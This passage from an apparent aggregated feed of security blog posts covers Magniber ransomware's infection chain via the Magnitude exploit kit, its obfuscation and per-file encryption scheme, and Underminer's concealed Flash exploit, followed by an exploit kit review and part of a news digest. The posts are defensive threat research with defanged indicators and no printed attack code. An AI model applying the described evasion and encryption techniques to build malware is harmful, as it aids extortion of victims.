ransomware. Eventually, it became a private operation that had a narrow geographic focus.\n\nDuring 2017, Magnitude delivered Cerber ransomware via a [filtering gate](<https://blog.malwarebytes.com/cybercrime/2017/08/enemy-at-the-gates-reviewing-the-magnitude-exploit-kit-redirection-chain/>) known as [Magnigate](<https://www.proofpoint.com/us/threat-insight/post/magnitude-actor-social-engineering-scheme-windows-10>), only to a select few Asian countries. In October 2017, the exploit kit operator began to distribute its own breed of ransomware, [Magniber](<https://twitter.com/kafeine/status/920252764600635392>). That change came with an interesting twist\u2014the malware authors went to great lengths to [limit infections to South Korea](<https://blog.malwarebytes.com/threat-analysis/2017/10/magniber-ransomware-exclusively-for-south-koreans/>). In addition to traffic filtering via country-specific malvertising chains, Magniber would only install if a specific country code was returned, otherwise it would delete itself.\n\nIn April 2018, Magnitude unexpectedly started [pushing the ever-growing GandCrab ransomware](<https://blog.malwarebytes.com/threat-analysis/2018/04/magnitude-exploit-kit-switches-gandcrab-ransomware/>), shortly after having [adopted](<https://twitter.com/kafeine/status/980505556715786242>) a fresh Flash zero-day ([CVE-2018-4878](<https://blog.malwarebytes.com/cybercrime/2018/02/new-flash-player-zero-day-comes-inside-office-document/>)). What may have been a test campaign did not last long, and shortly after, Magniber was back again. In our recent captures of Magnitude, we now see the latest Internet Explorer exploit ([CVE-2018-8174](<https://blog.malwarebytes.com/threat-analysis/2018/05/internet-explorer-zero-day-browser-attack/>)) being used primarily, which it [integrated](<https://twitter.com/kafeine/status/1002881951060160512>) after a week-long traffic interruption.\n\nIn this post, we take a look at some notable changes with Magniber. Its source code is now more refined, leveraging various obfuscation techniques and no longer dependent on a Command and Control server or hardcoded key for its encryption routine. In addition, while Magniber previously only targeted South Korea, it has now expanded its reach to other Asia Pacific countries.\n\n### Extracting the payload\n\n * [72fce87a976667a8c09ed844564adc75](<https://www.virustotal.com/#/file/6e57159209611f2531104449f4bb86a7621fb9fbc2e90add2ecdfbe293aa9dfc/details>) - loader DLL \n * [19599cad1bbca18ac6473e64710443b7](<https://www.virustotal.com/#/file/fb6c80ae783c1881487f2376f5cace7532c5eadfc170b39e06e17492652581c2/details>) - Magniber's core DLL\n\nThere are several stages before the final payload is downloaded and executed. After Magnigate's 302 redirection (Step 1), we see a Base64 obfuscated JavaScript (Step 2) used to launch Magnitude's landing page, along with a Base64 encoded VBScript. (Both original versions of the scripts are available at the end of this post in the IOCs.) After CVE-2018-8174's exploitation, the XOR-encrypted Magniber is retrieved.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/07/Magnitude_EK_.png> \"\" )\n\n_Figure 1. Traffic view of a Magniber infection, via Magnigate redirection and Magnitude EK_\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/07/js_.png> \"\" )\n\n_Figure 2. Decoded Javascript shows redirection to Magnitude's landing page_\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/07/CVE-2018-8174.png> \"\" )\n\n_Figure 3. VBScript code snippet showing part of CVE-2018-8174_\n\nOnce exploitation of the Use After Free vulnerability in Internet Explorer (CVE-2018-8174) is successful, the VBScript will execute the following shellcode:\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/07/array_shc_.png> \"\" )\n\n_Figure 4. Byte array (shellcode)_\n\nFunctionality-wise, this shellcode is a simple downloader. It downloads the obfuscated payload, decodes it by XOR with a key, and then deploys it:\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/07/open_url_.png> \"\" )\n\n_Figure 5. Downloading the final payload via InternetOpenUrlw API_\n\nThe downloaded payload ([72fce87a976667a8c09ed844564adc75](<https://www.virustotal.com/#/file/6e57159209611f2531104449f4bb86a7621fb9fbc2e90add2ecdfbe293aa9dfc/details>)) is, however, still not the Magniber core, but a next stage loader. This loader unpacks the Magniber's core DLL ([19599cad1bbca18ac6473e64710443b7](<https://www.virustotal.com/#/file/fb6c80ae783c1881487f2376f5cace7532c5eadfc170b39e06e17492652581c2/details>)) and injects it into a process.\n\nBoth elements, the loader and Magniber core, are DLLs with Reflective Loader stub, that load themselves into a current process using the [Reflective DLL injection](<https://github.com/stephenfewer/ReflectiveDLLInjection>) technique.\n\n### Behavioral analysis\n\nThe actions performed by Magniber haven't changed much; it encrypts files and at the end drops a ransom note named README.txt.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/07/ransom_note_.png> \"\" )\n\n_Figure 6. Ransom note left on the infected machine_\n\nThe given links lead to an onion page that is unique per victim and similar to many other ransomware pages:\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/07/victim_page_.png> \"\" )\n\n_Figure 7. Magniber's payment page_\n\nThe files encrypted by this version of Magniber can be identified by their extension: `.dyaaghemy`. While in the past each file was encrypted with the same AES key, this time each file is encrypted with a unique key\u2014the same plaintext gives a different ciphertext. The encrypted content has no patterns visible. That suggests that a stream cipher or a cipher with chained blocks was used (probably AES in CBC mode). Below you can see a BMP file before and after being encrypted by Magniber:\n\n\n\n_Figure 8. Visualizing a file before and after encryption_\n\n### Code changes\n\nMagniber is constantly evolving with big portions of its code fully rewritten over time. Below you can see a code comparison between the current Magniber DLL and an earlier version ([8a0244eedee8a26139bea287a7e419d9](<https://www.virustotal.com/#/file/8968c1b7a7aa95931fcd9b72cdde8416063da27565d5308c818fdaafddfa3b51/details>)), created with the help of BinDiff:\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/07/magni_compare_.png> \"\" )\n\n_Figure 9. Comparing an older Magniber with the newer one_\n\n#### Obfuscation\n\nThe authors put a lot of effort in improving obfuscation. [The first version we described](<https://blog.malwarebytes.com/threat-analysis/2017/10/magniber-ransomware-exclusively-for-south-koreans/>) was not obfuscated at all. The current, in contrast, is obfuscated using a few different techniques. First of all, API functions are now dynamically retrieved by their checksums. For example:\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/07/retrieve_func_.png> \"\" )\n\n_Figure 10. Calling API functions via checksum_\n\nComparing the new and the old version, we can see some overlapping fragments of code:\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/07/similarities.png> \"\" )\n\n_Figure 11. Old version with normal import calls vs. new version with dynamically retrieved functions_\n\nThe function pointer is retrieved by searching through export tables of the DLLs that are currently loaded. This technique requires that the DLL from which we want to retrieve the function to be already loaded. This algorithm of retrieving function was added to Magniber a few months ago, for example in the sample [60af42293d2dbd0cc8bf1a008e06f394](<https://www.virustotal.com/#/file/c6d5b0b475bcd9448fa7332140863e1747c97f33bab6d175024cb4b0c39c6b75/details>).\n\nIn addition, some of the parameters for the calls are dynamically calculated and junk code is added in between the operations. A string that is supposed to be loaded is scattered through several variables.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/07/load_lib_.png> \"\" )\n\n_Figure 12. Adding junk code to make analysis more tricky_\n\n#### File encryption\n\nWe can also observe some changes at the functionality level. [The early versions](<https://blog.malwarebytes.com/threat-analysis/2017/10/magniber-ransomware-exclusively-for-south-koreans/>) relied on the AES key downloaded from the CnC server (and in case if it was not available, falling back to the hardcoded one, making decryption trivial in such case). This time, Magniber comes with a public RSA key of the attackers that makes it fully independent from the Internet connection during the encryption process. This key is used for protecting the unique AES keys used to encrypt files.\n\nThe attacker's RSA key is hardcoded in the sample in obfuscated form. This is how it looks after deobfuscation:\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/07/rsa_key_.png> \"\" )\n\n_Figure 13. Deobfuscated RSA key_\n\nEach time a new file is going to be encrypted, two 16-byte long strings are generated. One will be used as an AES key, and another as an initialization vector (IV). Below you can see the fragment of code responsible for generating those pseudo-random strings.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/07/key_iv_.png> \"\" )\n\n_Figure 14. Generating pseudo-random strings_\n\nThe interesting fact is what they use as a random generator\u2014a weak source of randomness may create a vulnerability. We can see that under the hood [GetTickCount](<https://msdn.microsoft.com/pl-pl/library/windows/desktop/ms724408\\(v=vs.85\\).aspx>) is called:\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/07/to_next_val_.png> \"\" )\n\n_Figure 15. Random generator using GetTickCount_\n\nThe full reconstruction of the code generating the key and IV is available in the following snippet: <https://gist.github.com/hasherezade/7fb69fbd045315b42d7f962a83fdc300>\n\nBefore the ransomware proceeds to encrypt the file, the RSA key is imported and used to encrypt the generated data (key+IV):\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/07/key_encrypt_.png> \"\" )\n\n_Figure 16. RSA key import right before file encryption begins_\n\nIt produces an encrypted block of 256 bytes that is passed to the encrypting function, and later appended at the end of the encrypted file. Apart from those changes, files are encrypted similar [to before](<https://blog.malwarebytes.com/threat-analysis/2017/10/magniber-ransomware-exclusively-for-south-koreans/>), with the help of Windows' Crypto API.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/07/setting_key_iv_.png> \"\" )\n\n_Figure 16. Setting the AES key and initialization vector_\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/07/encrypt_and_write_.png> \"\" )\n\n_Figure 17. Encrypting and writing to a file_\n\n### Geographic expansion\n\nIn early July, we noted exploit attempts happening outside of the typical area we had become used to, for instance in Malaysia. At about the same time, a [tweet](<https://twitter.com/malwrhunterteam/status/1014866211174264837>) from MalwareHunterTeam mentioned infections in Taiwan and Hong Kong.\n\nFollowing the changes in the distribution scope, the code of Magniber got updated to whitelist more languages. Now the list expanded, adding other Asian languages, such as Chinese (Macau, China, Singapore) and Malay (Malysia, Brunei).\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/07/languages_set_.png> \"\" )\n\n_Figure 17. Expanded language checks_\n\n### Continuing evolution\n\nWhile Magniber was not impressive at first, having simple code and no obfuscation, it is actively developed and its quality continuously improves. Their authors appear professional, even though they commit some mistakes.\n\nThis ransomware operation is carried with surgical precision, from a careful distribution to a matching whitelist of languages. Criminals know exactly which countries they want to target, and they put their efforts to minimize noise and reduce collateral damage.\n\n[Malwarebytes](<https://www.malwarebytes.com/>) users are protected against this threat thanks to our anti-exploit module, which blocks Magnitude EK's attempt to exploit CVE-2018-8174 (VBScript engine vulnerability):\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/07/Magnitude_Block.gif> \"\" )\n\n_Thanks to [David Ledbetter](<https://twitter.com/ledtech3>) for his help with deobfuscating the VBScript._\n\n### Indicators of compromise (IOCs)\n \n \n 178.32.62[.]130,bluehuge[.]expert,Magnigate (Step 1)\n 94.23.165[.]192,69a5010hbjdd722q.feedrun[.]online,Magnigate (Step 2)\n 92.222.121[.]30,08taw3c6143ce.nexthas[.]rocks,Magnitude EK (Landing Page)\n 149.202.112[.]72,Magniber\n\nCode snippets\n\n * _[Javascript](<https://gist.github.com/malwarezone/62e765a5d238360af68c9ca654cc4513#file-3-vb>)_\n * _[VBScript](<https://gist.github.com/malwarezone/62e765a5d238360af68c9ca654cc4513#file-4-vb>)_\n\nMagniber (original)\n \n \n 6e57159209611f2531104449f4bb86a7621fb9fbc2e90add2ecdfbe293aa9dfc\n\nMagniber (core DLL)\n \n \n fb6c80ae783c1881487f2376f5cace7532c5eadfc170b39e06e17492652581c2\n\nThe post [Magniber ransomware improves, expands within Asia](<https://blog.malwarebytes.com/threat-analysis/2018/07/magniber-ransomware-improves-expands-within-asia/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "modified": "2018-07-16T17:00:16", "published": "2018-07-16T17:00:16", "id": "MALWAREBYTES:1EF2E06811A91F2948F835D21FF698ED", "href": "https://blog.malwarebytes.com/threat-analysis/2018/07/magniber-ransomware-improves-expands-within-asia/", "type": "malwarebytes", "title": "Magniber ransomware improves, expands within Asia", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-12-21T22:12:46", "bulletinFamily": "blog", "cvelist": ["CVE-2018-15982", "CVE-2018-4878", "CVE-2018-8174"], "description": "One of the most interesting exploit kits we track is also a bit of an elusive one, and as such does not receive the same scrutiny as its RIG and Fallout counterparts. Underminer was mentioned in our [Fall 2018 round up](<https://blog.malwarebytes.com/threat-analysis/2018/10/exploit-kits-fall-2018-review/>), and at the time was using [CVE-2018-8174](<https://blog.malwarebytes.com/threat-analysis/2018/05/internet-explorer-zero-day-browser-attack/>) (Internet Explorer) and [CVE-2018-4878](<https://blog.malwarebytes.com/cybercrime/2018/02/new-flash-player-zero-day-comes-inside-office-document/>) (Flash Player up to version 28.0.0.137).\n\nIn mid-December, we noticed some changes with Underminer that prompted us to take a deeper look. This happened around the same time frame as new zero-days and proof of concepts were available, which is typically an opportune moment for exploit kit authors to integrate.\n\n### Previous version and artifacts\n\nThe CVE-2018-4878 vulnerability is somewhat easy to spot within network traffic because it leaves some artifacts behind. Indeed, we use these in our lab and correlate them with other IOCs.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/12/artifacts_nov_.png> \"\" )\n\nTraffic view of Underminer EK in November, showing CVE-20184878 artifacts\n\nAs documented in our previous [blog post](<https://blog.malwarebytes.com/threat-analysis/2018/07/hidden-bee-miner-delivered-via-improved-drive-by-download-toolkit/>), Underminer uses client-server key exchange when it delivers its IE exploit, which encrypts the code but also prevents analysts from replaying it from a saved network capture. However, its SWF exploit up until now was deployed without such protections in place and could therefore be re-analyzed on its own.\n\n### New covert Flash exploit\n\nThe exploit appears to have changed as of mid-December. First, we did not see the Flash artifacts as we did before, which prompted us to test this exploit with a more recent version of Flash instead (31.0.0.153).\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/12/Underminer_flow.png> \"\" )\n\nTraffic view of the latest Underminer EK using a different Flash exploit implementation\n\nSecond, we saw a new snippet of code within the SWF exploit landing page referencing a _getSalt()_ function. This stoked our curiosity, and as we compared various traffic captures, we noticed that the function would always return different values.\n\nLooking at the SWF exploit itself, we saw code that interacts with the launcher page's JavaScript (_ExternalInterface.call_) and grabs that value in order to pass it to another function that decodes the exploit. When we attempted to replay the malicious SWF \"artificially,\" it would not fire properly.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/12/MBAE.png> \"\" )\n\nMalwarebytes Anti-Exploit triggering with Flash Player 31.0.0.153\n\nBecause the version of Flash we used was 31.0.0.135 (the latest Flash Player was not affected in our tests), we believe Underminer implemented the recent [CVE-2018-15982](<https://blog.malwarebytes.com/malwarebytes-news/2018/12/new-flash-player-zero-day-used-russian-facility/>).\n\nThe way the final payload is packaged and executed remains unique to Underminer. It's what we call [Hidden Bee](<https://blog.malwarebytes.com/threat-analysis/2018/08/reversing-malware-in-a-custom-format-hidden-bee-elements/>). Hidden Bee is a custom payload that has specific modules and lacks the structure of the typical PE format. For this reason, it is more difficult to analyze and gives the attackers more flexibility than if they were using simple shellcode instead.\n\nMalwarebytes users are already protected against this exploit kit, as we block both the Internet Explorer and Flash Player exploits.\n\n### Indicators of compromise (IOCs)\n\nUnderminer IP:\n \n \n 98.126.222[.]187\n\nFlash exploit\n \n \n d75710ebc8516e73e3a8dd7d1ad1ebc3221b7a141659c7e84b9f5f97dd7ec09e\n\nCustom payload\n \n \n 5574f4b0b507130db06072930016ed5d2ef79aaa1262faddfdb88891c1599672\n\nThe post [Underminer exploit kit improves in its latest iteration](<https://blog.malwarebytes.com/threat-analysis/2018/12/underminer-exploit-kit-improves-latest-iteration/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "modified": "2018-12-21T21:34:24", "published": "2018-12-21T21:34:24", "id": "MALWAREBYTES:CCB1B1B23474798BB372D709A6E97F86", "href": "https://blog.malwarebytes.com/threat-analysis/2018/12/underminer-exploit-kit-improves-latest-iteration/", "type": "malwarebytes", "title": "Underminer exploit kit improves in its latest iteration", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-12T17:22:49", "bulletinFamily": "blog", "cvelist": ["CVE-2018-15982", "CVE-2018-4878", "CVE-2018-8174"], "description": "Active malvertising campaigns in December and the new year have kept exploit kit activity from hibernating in winter 2019. We mostly observed Fallout and RIG with the occasional, limited GrandSoft appearance for wider geo-targeting.\n\nIn addition, narrowly-focused exploit kits such as Magnitude, Underminer, and GreenFlash Sundown stayed on the same track: delivering ransomware to mostly Asian countries, and South Korea in particular.\n\n### Winter 2019 overview\n\n * Fallout EK\n * RIG EK\n * GrandSoft EK\n * Magnitude EK\n * Underminer EK\n * GreenFlash Sundown EK\n\nInternet Explorer\u2019s [CVE-2018-8174](<https://blog.malwarebytes.com/threat-analysis/2018/05/internet-explorer-zero-day-browser-attack/>) and Flash\u2019s [CVE-2018-4878](<https://blog.malwarebytes.com/cybercrime/2018/02/new-flash-player-zero-day-comes-inside-office-document/>) continue to be the most common vulnerabilities across the board, even though a couple exploit kits have now integrated the newer Flash [CVE-2018-15982](<https://blog.malwarebytes.com/malwarebytes-news/2018/12/new-flash-player-zero-day-used-russian-facility/>).\n\n### Fallout EK\n\nFallout keeps bringing fresh air into an otherwise stale atmosphere by introducing new [features](<https://blog.malwarebytes.com/threat-analysis/2019/01/improved-fallout-ek-comes-back-after-short-hiatus/>) and even adopting newer vulnerabilities. It also appears to be a good experimental framework for some actors who have customized the payload delivery. Fallout was the second exploit kit to add [CVE-2018-15982](<https://malware.dontneedcoffee.com/2019/01/CVE-2018-15982.html>), a more recent vulnerability for the Flash Player.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2019/02/Fallout_EK_.png> \"\" )\n\n### RIG EK\n\nGood old RIG is still kicking around, but has taken a back seat to the newer Fallout in many of the malvertising chains we track, except perhaps for [Fobos](<https://malwarebreakdown.com/2017/08/16/fobos-campaign-using-rig-ek-to-drop-bunitu-trojan/>). There haven't been any notable changes to report since we last reviewed it.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2019/02/RIG_EK_.png> \"\" )\n\n### GrandSoft EK\n\nGrandSoft and its Ramnit payload still go hand-in-hand via limited distribution tied to compromised websites. It is perhaps one of the least sophisticated exploit kits on the market right now.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2019/02/GrandSoft_EK.png> \"\" )\n\n### Magnitude EK\n\nMeanwhile, Magnitude EK is active and served up via malvertising chains, with a focus on some APAC countries like South Korea. Magnitude continues to deliver its fileless Magniber ransomware payload.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2019/02/Magnitude_EK_.png> \"\" )\n\n### Underminer EK\n\nUnderminer's over-the-top encryption schemes to hide its exploits are keeping us researchers honest when trying to identify exactly what is under the hood. It's worth noting that only a few days after the Flash zero-day and Proof of Concept (PoC) had been published ([CVE-2018-15982](<https://blog.malwarebytes.com/malwarebytes-news/2018/12/new-flash-player-zero-day-used-russian-facility/>)), Underminer was already [implementing](<https://blog.malwarebytes.com/threat-analysis/2018/12/underminer-exploit-kit-improves-latest-iteration/>) it.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2019/02/Underminer_EK.png> \"\" )\n\n### GreenFlash Sundown EK\n\nAlso a geo-specific exploit kit, GreenFlash Sundown has been delivering various breeds of ransomware to targets in Asia. In our latest capture, we saw it drop the Seon ransomware on South Korean users.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2019/02/GreenFlash_Sundown.png> \"\" )\n\n### Mitigation\n\nWhile timely patching and avoidance of Internet Explorer as a web browser would offer protection against the above-mentioned exploit kits, the reality is that many users (especially in corporate environments) are still trailing behind. In addition, while IE is being phased out in North America, it's still highly adopted in Asian countries\u2014which explains why they are currently being targeted.\n\n[Malwarebytes' anti-exploit technology](<http://www.malwarebytes.com>) blocks each of these exploit kits\u2014Fallout, RIG, GrandSoft, Magnitude, Underminer, and GreenFlash Sundown\u2014before they even have a chance to drop their payload.\n\n\n\nAs we move further into 2019, we can say that exploit kits, while nowhere near their peak activity in 2017, are still hanging on, being used primarily in malvertising distribution campaigns. In terms of global activity, Fallout is leading the charge, providing the most diverse campaigns and payloads. Meanwhile, the Asia-specific EKs are for the most part continuing on with their usual pattern of driving innovation (to a degree) and distributing ransomware.\n\nThe post [Exploit kits: winter 2019 review](<https://blog.malwarebytes.com/threat-analysis/2019/02/exploit-kits-winter-2019-review/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "modified": "2019-02-12T16:00:00", "published": "2019-02-12T16:00:00", "id": "MALWAREBYTES:B3C57DCB817E8FCEC5860BC0C22D5A2A", "href": "https://blog.malwarebytes.com/threat-analysis/2019/02/exploit-kits-winter-2019-review/", "type": "malwarebytes", "title": "Exploit kits: winter 2019 review", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "qualysblog": [{"lastseen": "2019-01-23T20:50:13", "bulletinFamily": "blog", "cvelist": ["CVE-2017-5715", "CVE-2017-5753", "CVE-2017-5754", "CVE-2018-4878"], "description": "\n\nIt\u2019s been a busy week in InfoSec land, as Intel released a new Spectre patch, iOS source code was leaked online, and a zero-day Flash bug got exploited in the wild.\n\nAlso making noise these past few days: A major security hole in the Grammarly web app, WordPress updates tripping over each other, and a data breach at a Swiss telecom company.\n\nAs has been the case these past few weeks, we\u2019ll lead off with the latest on Meltdown and Spectre, the hardware vulnerabilities whose disclosure on Jan. 3 sent shockwaves through the IT industry due to their scope and severity, and which are expected to remain an issue for years.\n\n### Intel mitigates Spectre vulnerability with Skylake update\n\nFor a change, the latest Meltdown / Spectre development is encouraging: On Wednesday, Intel announced [some progress](<https://newsroom.intel.com/news/security-issue-update-progress-continues-firmware-updates/>) in its ongoing and often erratic attempts to update the firmware of a variety of its CPUs impacted by the vulnerabilities.\n\nSpecifically, Intel delivered to its OEM customers and industry partners production microcode updates to mitigate Spectre's Variant 2 vulnerability (CVE 2017-5715) on several Skylake-based platforms, and promised \u201cto do the same for more platforms in the coming days.\u201d\n\n\n\n\u201cWe also continue to release beta microcode updates so that customers and partners have the opportunity to conduct extensive testing before we move them into production,\u201d Navin Shenoy, executive VP and GM of Intel\u2019s Data Center Group, said in a blog post.\n\nThose efforts include the glitchy Broadwell and Haswell microcode updates for this Spectre variant, the branch target injection vulnerability. Intel had to [pull those updates](<https://blog.qualys.com/news/2018/01/26/meltdown-spectre-intel-nixes-patches-tech-ceos-questioned-on-information-blackout>) because they created a variety of problems, including frequent and random system reboots, and [data loss and corruption](<https://blog.qualys.com/news/2018/02/02/meltdown-spectre-new-concerns-over-intel-patches-as-hackers-test-exploits>).\n\nSaying that its current and future CPUs fixes will be made available to end customers in most cases through OEM firmware updates, Shenoy stressed the importance for system owners to always keep them up to date.\n\nShenoy also acknowledged that Intel has a lot of work ahead, as he provided a link to a document listing [impacted Intel platforms](<https://newsroom.intel.com/wp-content/uploads/sites/11/2018/02/microcode-update-guidance.pdf>) and the status of their fixes.\n\nQualys has been on top of the Meltdown / Spectre issue from the very start, dispensing advice and insight publicly in [blog posts](<https://blog.qualys.com/news/2018/01/18/meltdown-and-spectre-arent-business-as-usual>), [news articles](<https://www.darkreading.com/risk/microsoft-issues-emergency-patch-to-disable-intels-broken-spectre-fix/d/d-id/1330932?>) and [webcasts](<https://www.qualys.com/webcasts/avoid-meltdown-from-the-spectre?utm_source=blog&utm_medium=website&utm_campaign=demand-gen&utm_term=news-digest-q1-2018&utm_content=webcast&leadsource=344564601>), as the industry scrambles to deal with these vulnerabilities, which affect most Intel CPUs released in the past 20 years, as well as a smaller quantity of ARM and AMD CPUs.\n\nMeltdown (CVE-2017-5754) provides access to all physical memory, including kernel memory, via a user mode, ring 3 process, so that \u201cany process running in the system can access all the contents of physical memory,\u201d Qualys Product Management Director Jimmy Graham said recently during a [webcast](<https://www.qualys.com/webcasts/avoid-meltdown-from-the-spectre?utm_source=blog&utm_medium=website&utm_campaign=demand-gen&utm_term=news-digest-q1-2018&utm_content=webcast&leadsource=344564601>).\n\nAttackers could steal passwords, grab private keys and do whatever necessary to escalate their system privileges to administrator levels. \u201cAnything that can be stored in memory can be accessed through Meltdown,\u201d Graham said.\n\nMeanwhile, Spectre (CVE-2017-5753, CVE-2017-5715) impacts Intel, AMD, and ARM CPUs by abusing branch prediction and speculative execution, resulting in data leakage from compromised processes.\n\n### Another Flash crash\n\nAdobe warned late last week about a critical vulnerability in its Flash Player that can allow an attacker to take control of the affected system.\n\nIn a [security advisory](<https://helpx.adobe.com/security/products/flash-player/apsa18-01.html>), Adobe said that the vulnerability (CVE-2018-4878) affects Flash Player 28.0.0.137 and earlier versions, and that it was aware of an exploit in the wild \u201cbeing used in limited, targeted attacks against Windows users.\u201d\n\n\n\n\u201cThese attacks leverage Office documents with embedded malicious Flash content distributed via email,\u201d the advisory reads.\n\nOn Wednesday, Adobe [released patches](<https://helpx.adobe.com/security/products/flash-player/apsb18-03.html>) for the affected Flash Player versions for Windows, Macintosh, Linux and Chrome OS, ahead of its next scheduled patch release on Tuesday April 13. \n\n\u201cThis is surely yet another reason for Adobe Flash's still large number of users to consider whether it's time to call an end to what can charitably be called a rocky relationship,\u201d independent security analyst Graham Cluley [wrote](<https://www.grahamcluley.com/unpatched-adobe-flash-flaw/>) on his blog.\n\nHe recommends either removing Flash from computers altogether, or at least enabling the \u201cclick to play\u201d option as an extra protection layer.\n\n\u201cIt doesn't take Nostradamus to predict that this isn't going to be the last discovery of a remotely exploitable vulnerability in Flash. Chances are that there is another zero-day vulnerability in Adobe Flash just around the corner,\u201d he wrote.\n\nOver at Sophos\u2019 Naked Security blog, Paul Ducklin [reminded](<https://nakedsecurity.sophos.com/2018/02/02/adobe-warns-of-flash-zero-day-patch-to-come-next-week/>) readers that \u201cturning off Flash in your browser isn\u2019t enough.\u201d That prevents Flash files embedded in web pages from rendering inside browsers, \u201cbut doesn\u2019t remove the Flash playing software from your computer as a whole.\u201d\n\n\u201cWe\u2019re assuming that the crooks chose to embed their booby-trapped Flash file inside an Office document to bypass your browser, where many users have already blocked Flash from playing, or only activate it for specific websites,\u201d Ducklin wrote.\n\n### iOS source code leaked\n\n\n\nApple also blipped in the cyber security news radar when [Motherboard reported](<https://motherboard.vice.com/en_us/article/a34g9j/iphone-source-code-iboot-ios-leak>) on Wednesday that a key portion of iOS source code had gotten posted anonymously on GitHub. The source code element in question was for iBoot, one of the most critical iOS programs, and was taken from iOS 9.\n\nApple scrambled to file a DMCA takedown notice, so the code was removed, but it\u2019s safe to assume it was available long enough for it to have been copied multiple times.\n\nApple [downplayed the importance of the leak](<https://www.macworld.com/article/3254231/ios/ios-source-code-leak-github.html>), saying that it came from an old iOS version and that multiple security safeguards exist to protect users.\n\n\u201cOld source code from three years ago appears to have been leaked, but by design the security of our products doesn't depend on the secrecy of our source code,\u201d Apple said in a statement, as reported by Macworld.\n\n\u201cThere are many layers of hardware and software protections built into our products, and we always encourage customers to update to the newest software releases to benefit from the latest protections,\" the statement reads.\n\nStill, Motherboard pointed out that portions of the leaked source code likely still exist in iOS\u2019 current version, and that Apple had security reasons to keep this software confidential.\n\n\u201cApple has traditionally been very reluctant to release code to the public, though it has made certain parts of iOS and MacOS open source in recent years. But it has taken particular care to keep iBoot secure and its code private,\u201d the Motherboard article reads, noting that boot process bugs carry the highest value when reported through Apple\u2019s [bounty program](<https://techcrunch.com/2016/08/04/apple-announces-long-awaited-bug-bounty-program/>): reportedly up to $200,000.\n\nJonathan Levin, author of books on iOS and Mac OSX, told Motherboard that access to the iBoot source code gives iOS security researchers a better chance to find vulnerabilities that could lead to compromising or jailbreaking the device. \n\nIt could also make it easier for hackers to find flaws that could allow them to crack or decrypt an iPhone, Levin said, adding that the leak could allow advanced programmers to emulate iOS on non-Apple platforms.\n\n### In other security news \u2026\n\n**Update that WordPress update, chop chop**\n\nOn Monday, WordPress released a run-of-the-mill [maintenance update (4.9.3)](<https://wordpress.org/news/2018/02/wordpress-4-9-3-maintenance-release/>) that fixed 34 bugs but that also inadvertently broke the blog publishing platform\u2019s automatic update functionality.\n\nAs a result, the next day WordPress issued [another update (4.9.4)](<https://wordpress.org/news/2018/02/wordpress-4-9-4-maintenance-release/>) that fixes the \u201csevere bug\u201d introduced on Monday, which causes \u201csites that support automatic background updates to fail to update automatically.\u201d\n\nThe catch? WordPress admins have to install the latest update manually, of course.\n\nIf you\u2019re interested in the technical details of what went wrong with Monday\u2019s update, [read this WordPress post](<https://make.wordpress.org/core/2018/02/06/wordpress-4-9-4-release-the-technical-details/>).\n\n**Massive security hole found in Grammarly grammar checker**\n\nGoogle security researcher Tavis Ormandy [found](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1527&desc=3>) a major security flaw in the Grammarly browser extension that exposed its auth tokens to all websites, making it possible for unauthorized parties to[ access users\u2019 documents](<https://threatpost.com/grammarly-patches-chrome-extension-bug-that-exposed-users-docs/129794/>).\n\nThe researcher gave props to Grammarly for fixing the issue and releasing an update to the Chrome Web Store within hours, calling the turnaround \u201ca really impressive response time.\u201d The bug was fixed in Grammarly's extensions for both Firefox and Chrome. The Chrome extension is used by about 22 million people, according to Ormandy.\n\nOn its Twitter account, Grammarly [said](<https://twitter.com/Grammarly/status/960691435208032256>) it has no evidence that any user information was compromised, and specified that the bug potentially affected text saved in the Grammarly Editor, but not the Grammarly Keyboard, the Grammarly Microsoft Office add-in, \u201cor any text typed on websites while using the browser extension.\u201d\n\n**Swisscom customer data stolen using partner's credentials**\n\nSwitzerland\u2019s Swisscom telecom [disclosed](<https://www.swisscom.ch/en/about/medien/press-releases/2018/02/20180207-mm-swisscom-verschaerft-sicherheitsmassnahmen-fuer-kundenangaben.html>) on Wednesday that in last year\u2019s fourth quarter, the \u201cnon-sensitive\u201d contact details of about 800,000 of its customers -- representing about 10% of the country's population -- were accessed without authorization, including names, addresses, telephone numbers and dates of birth\n\nThe interesting twist to this story is that the unknown cyber criminals snatched the data using 